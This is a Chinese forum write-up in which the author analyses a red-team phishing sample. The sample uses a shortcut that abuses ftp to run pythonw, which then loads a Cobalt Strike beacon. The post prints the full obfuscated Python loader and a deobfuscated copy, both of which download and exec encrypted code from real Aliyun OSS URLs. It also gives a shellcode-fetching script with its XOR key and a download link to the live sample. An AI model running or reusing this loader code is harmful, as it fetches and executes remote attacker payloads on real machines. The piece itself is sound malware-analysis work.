【PC样本分析】记录自己的第一次红队钓鱼样本分析

科技   2024-08-22 15:39   北京  

作者坛账号:yinsel


记录自己的第一次红队钓鱼样本分析

前言

HVV 遇到了邮件钓鱼,有个样本挺有趣,自己又没分析过样本,于是便想尝试分析一下,并记录下来,同时学习一下红队大佬们的思路,大佬勿喷,讲的比较哆嗦。

详细分析过程

尝试上线分析流量

先尝试上线看看流量,这里我用 proxifier 强制走 Reqable 分析一下流量:

使用了阿里CDN,有点像 CS 的流量:

查一下域名,好家伙还是备案的:

估计用了域前置(我也想用啊 QAQ),话不多说,开始分析!

分析上线流程

样本是一个压缩包,解压后包含一个快捷方式以及一个文件夹:

解压后:

文件夹的内容:

这一看就是打包的一个 python 环境,并且是 embed 版本,可以在这里找到对应的版本下载:

https://www.python.org/ftp/python/

接着查看快捷方式属性:

这种快捷方式我见的比较少,他利用了 ftp 来执行系统命令,通过执行-s 参数执行 WeChatWin.dll 文件内的 ftp 命令。

查阅资料后,可以得知 ftp 有个特性,可以直接使用 ! 执行系统命令,这我还是第一次知道,太冷门了(红队真狡猾啊),并且还可以使用 -s:<文件> 可以运行文件中的 ftp 命令。

有了这个基础,接下来我们看看 WeChatWin.dll 里是啥:

不出所料,使用了 ftp 的 ! 来执行系统命令,start /b 代表以后台模式启动一个程序,分析得知,它使用了 pythonw.exe 来执行 main.pywpythonw.exe 是 python 的无窗口版本,然后又打开了一个 word 文档来迷惑受害者,并且它还是加密的文档,正常人遇到加密的肯定想着寻找密码,可以拖延时间,其中 bye 用于结束 ftp 命令,避免出现黑窗口引起怀疑。

继续查看一下 main.pyw :

导入了一个模块,同目录下还有一个 action.py,是一个混淆的 python 脚本,猜测是在这里混淆的:

https://pyob.oxyry.com/ ,代码如下:

 复制代码 隐藏代码
import ast
import pickle
import ctypes ,urllib .request ,codecs ,base64
import sys ,ssl
ssl ._create_default_https_context =ssl ._create_unverified_context
OO00O0OO00OO00OO0 =urllib .request .urlopen ('https://n8ovkgib7gm.oss-cn-chengdu.aliyuncs.com/T0Lq033PB').read ()
def O0OO0OO000000OOO0 (O0OOO00O000O0OO0O ,OOOOO0000O0OO00OO ):
    O0OO000OO0OOO0O00 =bytearray (len (O0OOO00O000O0OO0O ))
    for OOO000OOO0000O0O0 in range (len (O0OOO00O000O0OO0O )):
        O0OO000OO0OOO0O00 [OOO000OOO0000O0O0 ]=O0OOO00O000O0OO0O [OOO000OOO0000O0O0 ]^OOOOO0000O0OO00OO [OOO000OOO0000O0O0 %len (OOOOO0000O0OO00OO )]
    return bytes (O0OO000OO0OOO0O00 )
def OO0000OO00O00OOOO (O00OO00OOO0OOOO0O ,O0O00O00O00OO00O0 ):
    return O0OO0OO000000OOO0 (O00OO00OOO0OOOO0O ,O0O00O00O00OO00O0 )
def OOOOO000O0OOOOO00 (OOOOOOOOO0O0OO000 ):
    O0O0OO0O0OO0O00OO =""
    for OOOOOO0O000O0OOO0 in range (3 ,len (OOOOOOOOO0O0OO000 ),4 ):
        O0O0OO0O0OO0O00OO +=OOOOOOOOO0O0OO000 [OOOOOO0O000O0OOO0 ]
    O0000O0O0OOO000O0 =base64 .b64decode (O0O0OO0O0OO0O00OO )
    return O0000O0O0OOO000O0 .decode ()
OO00O0OO00OO00OO0 =OOOOO000O0OOOOO00 (OO00O0OO00OO00OO0 .decode ())
class A (object ):
    def __reduce__ (OOOOOOOOO000000OO ):
        return (exec ,(OO00O0OO00OO00OO0 ,))
def O00O0O0OOO00O0OOO (O000OOO0O0OO0O00O ):
    try :
        O00OOO0OO00O00OOO =ast .parse (O000OOO0O0OO0O00O ,mode ='exec')
        exec (compile (O00OOO0OO00O00OOO ,filename ="<string>",mode ="exec"))
    except Exception as OO0OOO00000OO00O0 :
        exit ()
OO0OOO00O0O00OO0O ="tvpcvulmyrlVuhk0yqhIjosDzwn0nlbgwancrdgGypalpdljqqpaxmw2awvxgrblftiLlxzmkscRxth1cymbcxoXanlBnjfzeyjKvhdEwbfEciroaepKvgqSfqgksocNvgqCpoantnmJfpkllehdbowFchr9txqijjiYqvfXblrNtsllfihNqxsjvrbQbljgpizPmwnSiseBzvbiopfYfliXxvkNgemlsjlNkocjkwjQeayubakYogmjehpYicy0afpZugrWxvl5ninjkgwbmnb2yzcRefulzybKvckHsvzJybrlfprdtqpCstbknnuNzizCjxznckpJwvzluundngsFxeo9igykalmZzxoWkdhNzlzvipsZwlwGxvqUokxgxekPgbmSnoyBtrmikbmYktdXkxqNtboljzdNaanjlddQlyguyoyYrlxjxvlYhat0vyeZdhtGgvnVfixjnzmbukh2rjqRvrslhbeKrzpHfslJcqeleekduluFxkf9siuiibeYlnbXykkNznalnbyNhpijsfvQgyzpscsDkslQgoppjuiwizwaqeeWgzrNgktrtrfbfggGfjwUkkyuyfdbdiyGguo9ncshkctZhckHpfjMzrpozsschipmzgnVcyb0pmgXbmz2bosRlgxlcecYwbt2jsw9mkckmnpZsmrSrnskths="
OOO00O0O00OO00O0O =OOOOO000O0OOOOO00 (OO0OOO00O0O00OO0O )
O00O0O0OOO00O0OOO (OOO00O0O00OO00O0O )

面对这种混淆的代码,实在是看着脑瓜子疼,于是使用 AI 来帮我们做一下还原,看看代码在做什么,有一说一,AI 对于还原混淆代码的能力还挺强的,以下是使用 ChatGPT 还原并加上注释的 python 代码:

 复制代码 隐藏代码
import ast
import ctypes
import urllib.request
import base64
import ssl

# 禁用SSL证书验证,允许连接到不安全的服务器
ssl._create_default_https_context = ssl._create_unverified_context

# 从指定的URL下载加密的脚本数据
encrypted_script_data = urllib.request.urlopen('https://n8ovkgib7gm.oss-cn-chengdu.aliyuncs.com/T0Lq033PB').read()

# 定义XOR解密函数
def xor_decrypt(data, key):
    decrypted_data = bytearray(len(data))
    for i in range(len(data)):
        # 将每个字节与密钥的对应字节进行异或运算
        decrypted_data[i] = data[i] ^ key[i % len(key)]
    return bytes(decrypted_data)

# 从加密的字符串中提取Base64编码的部分
def extract_base64_string(encoded_string):
    base64_string = ""
    for i in range(3, len(encoded_string), 4):
        # 每4个字符取一个字符,拼接成Base64编码的字符串
        base64_string += encoded_string[i]
    decoded_bytes = base64.b64decode(base64_string)
    return decoded_bytes.decode()

# 解码从远程服务器获取的脚本数据
decoded_script = extract_base64_string(encrypted_script_data.decode())

# 定义用于不安全反序列化的类A
class A(object):
    def __reduce__(self):
        # 将解密后的脚本传递给exec函数执行
        return (exec, (decoded_script,))

# 解析并尝试执行传入的Python代码字符串
def execute_script(script):
    try:
        # 将字符串解析为AST(抽象语法树)
        parsed_ast = ast.parse(script, mode='exec')
        # 编译AST并执行生成的字节码
        exec(compile(parsed_ast, filename="<string>", mode="exec"))
    except Exception as e:
        # 捕获任何异常并退出
        exit()

# 加密的密钥字符串
encrypted_key = "tvpcvulmyrlVuhk0yqhIjosDzwn0nlbgwancrdgGypalpdljqqpaxmw2awvxgrblftiLlxzmkscRxth1cymbcxoXanlBnjfzeyjKvhdEwbfEciroaepKvgqSfqgksocNvgqCpoantnmJfpkllehdbowFchr9txqijjiYqvfXblrNtsllfihNqxsjvrbQbljgpizPmwnSiseBzvbiopfYfliXxvkNgemlsjlNkocjkwjQeayubakYogmjehpYicy0afpZugrWxvl5ninjkgwbmnb2yzcRefulzybKvckHsvzJybrlfprdtqpCstbknnuNzizCjxznckpJwvzluundngsFxeo9igykalmZzxoWkdhNzlzvipsZwlwGxvqUokxgxekPgbmSnoyBtrmikbmYktdXkxqNtboljzdNaanjlddQlyguyoyYrlxjxvlYhat0vyeZdhtGgvnVfixjnzmbukh2rjqRvrslhbeKrzpHfslJcqeleekduluFxkf9siuiibeYlnbXykkNznalnbyNhpijsfvQgyzpscsDkslQgoppjuiwizwaqeeWgzrNgktrtrfbfggGfjwUkkyuyfdbdiyGguo9ncshkctZhckHpfjMzrpozsschipmzgnVcyb0pmgXbmz2bosRlgxlcecYwbt2jsw9mkckmnpZsmrSrnskths="
# 提取并解码加密的密钥字符串
decoded_key = extract_base64_string(encrypted_key)

# 尝试执行解密后的脚本
execute_script(decoded_key)

可以看到脚本的内容主要是从存储桶中下载加密的 python 脚本再使用 base64 和 XOR 解密后再编译运行,同时还定义了一个重写了 __reduce__ 方法的类,后续的 python 代码执行可能会利用反序列化来触发执行,尝试将 decoded_script 和
decoded_payload 进行打印:

最终利用反序列化触发执行 python 的远程分离加载器。

提取原始 shellcode

使用以下代码将远程下载的 shellcode 保存下来:

 复制代码 隐藏代码
import ctypes,urllib.request,codecs,base64
encrypted_data = urllib.request.urlopen('https://acbeefaezy6nkh.oss-cn-wulanchabu.aliyuncs.com/OwJXDt3b').read()
encrypted_data = encrypted_data.strip()

def xor_decrypt(data, key):
    decrypted_data = bytearray(len(data))
    for i in range(len(data)):
        decrypted_data[i] = data[i] ^ key[i % len(key)]
    return bytes(decrypted_data)

key = b'BVJgJShZbeqfrqHjp'
decoded_data = base64.b64decode(encrypted_data)
sc = xor_decrypt(decoded_data, key)
with open("shellcode.bin","wb") as f:
    f.write(sc)

Shellcode 如下:

E8 开头,有点像 sgn 编码后的 shellcode,使用 x64dbg 调试:

可以看到有些指令不合法,很明显是加密了,单步调试发现它正在动态的解密,应该是经过 sgn 编码后 shellcode,特点是通常以 E8 开头,使用 call 指令作为入口,目的是调用一个函数来动态解密。

接着我需要 dump 原始的 shellcode,因此这里我尝试对 LoadlibraryA 进行断点,因为这个时候 shellcode 已经解密完成了,断点后点击运行并观察 shellcode 对应的内存:

这里断住了,可以发现内存的变化,可以看到有个显眼的 MZ ,经典 CS 马,将其 dump 出来:

使用 CobaltStrikeParser 解析 shellcode:


分析完毕!


样本链接:https://wwqd.lanzoul.com/imH4c280phdg(解压密码52pojie)


-官方论坛

www.52pojie.cn


👆👆👆

公众号设置“星标”,不会错过新的消息通知
开放注册、精华文章和周边活动等公告


吾爱破解论坛
吾爱破解论坛致力于软件安全与病毒分析的前沿,丰富的技术版块交相辉映,由无数热衷于软件加密解密及反病毒爱好者共同维护,留给世界一抹值得百年回眸的惊艳,沉淀百年来计算机应用之精华与优雅,任岁月流转,低调而奢华的技术交流与探索却是亘古不变。
 最新文章